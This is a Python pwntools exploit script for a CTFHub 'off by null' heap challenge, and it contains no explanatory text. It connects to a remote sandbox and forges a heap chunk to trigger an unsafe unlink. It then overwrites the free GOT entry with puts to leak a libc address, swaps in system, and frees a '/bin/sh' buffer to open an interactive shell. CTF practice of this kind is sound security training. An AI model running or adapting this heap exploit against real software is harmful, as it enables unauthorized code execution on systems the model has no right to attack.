CTFHub技能树-----pwn off by null

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-c1de9e72dce05941.sandbox.ctfhub.com",26940)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")

def add(size):
	io.recvuntil(b"Choice:")
	io.sendline(b"1")
	io.recvuntil(b"Size: ")
	io.sendline(str(size))


def edit(idx,data):
	io.recvuntil(b"Choice:")
	io.sendline(b"2")
	io.recvuntil(b"Index: ")
	io.sendline(str(idx))
	io.recvuntil(b"Content: ")
	io.sendline(data)


def free(idx):
	io.recvuntil(b"Choice:")
	io.sendline(b"3")
	io.recvuntil(b"Index: ")
	io.sendline(str(idx))

fake_chunk = 0x602140
fake_fd = fake_chunk-0x18
fake_bk = fake_chunk-0x10

add(0x88)
add(0x4f8)
add(0x80)
payload = p64(0)+p64(0x81)+p64(fake_fd)+p64(fake_bk)+b"a"*(0x80-4*8)
payload += p64(0x80)
edit(0,payload)
free(1)

puts_plt = b"\xB0\x06\x40\x00\x00"
puts_got = elf.got['puts']
free_got = elf.got['free']
edit(0,p64(0)*3+p64(free_got)+p64(puts_got))
edit(0,puts_plt)
edit(2,p64(puts_got))
free(1)

puts_addr = u64(io.recv(6).ljust(8,b"\x00"))
libc_addr = puts_addr-libc.sym['puts']
system_addr = libc_addr+libc.sym['system']
print("puts_addr----------->: ",hex(puts_addr))
print("libc_addr----------->: ",hex(libc_addr))
print(p64(system_addr)[0:7])


edit(0,p64(system_addr)[0:7])
edit(2,b"/bin/sh\x00")
free(2)




io.interactive()